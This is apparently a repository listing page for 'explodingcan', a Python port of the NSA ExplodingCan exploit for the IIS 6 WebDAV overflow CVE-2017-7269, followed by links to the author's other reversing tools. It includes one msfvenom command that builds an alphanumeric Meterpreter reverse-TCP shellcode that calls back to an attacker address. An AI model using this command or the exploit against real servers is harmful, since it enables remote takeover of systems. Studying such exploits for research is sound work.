danigargu/explodingcan

Stars
258
Rank 158,189 (Top 4 %)
Language
Python
Created almost 7 years ago
Updated almost 7 years ago

danigargu/explodingcan

danigargu

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

An implementation of NSA's ExplodingCan exploit in Python

ExplodingCan

An implementation of ExplodingCan's exploit extracted from FuzzBunch, the "Metasploit" of the NSA.

Details

Vulnerability: Microsoft IIS WebDav 'ScStoragePathFromUrl' Remote Buffer Overflow
CVE: CVE-2017-7269
Disclosure date: March 31 2017
Affected product: Microsoft Windows Server 2003 R2 SP2 x86

Why?

Months ago I needed to study this exploit, and finally I implemented it in python.

Shellcode

The shellcode must be in alphanumeric format due to the limitations of the bug. For example we can use msfvenom (metasploit) with the alpha_mixed encoder.

$ msfvenom -p windows/meterpreter/reverse_tcp -f raw -v sc -e x86/alpha_mixed LHOST=172.16.20.1 LPORT=4444 >shellcode

Links

CVE-2020-0796

CVE-2020-0796 - Windows SMBv3 LPE exploit #SMBGhost

heap-viewer

IDA Pro plugin to examine the glibc heap, focused on exploit development

deREferencing

IDA Pro plugin that implements more user-friendly register and stack views

syms2elf

A plugin for Hex-Ray's IDA Pro and radare2 to export the symbols recognized to the ELF symbol table

IDAtropy

IDAtropy is a plugin for Hex-Ray's IDA Pro designed to generate charts of entropy and histograms using the power of idapython and matplotlib.

urlfuzz

Another web fuzzer written in NodeJS

ratone

A console for assemble/disassemble code using capstone/keystone

ida-scripts

Misc IDA Pro scripts

my_challenges

A repository of challenges I've created

wargames

Solutions for some wargames and ctfs.

danigargu.github.io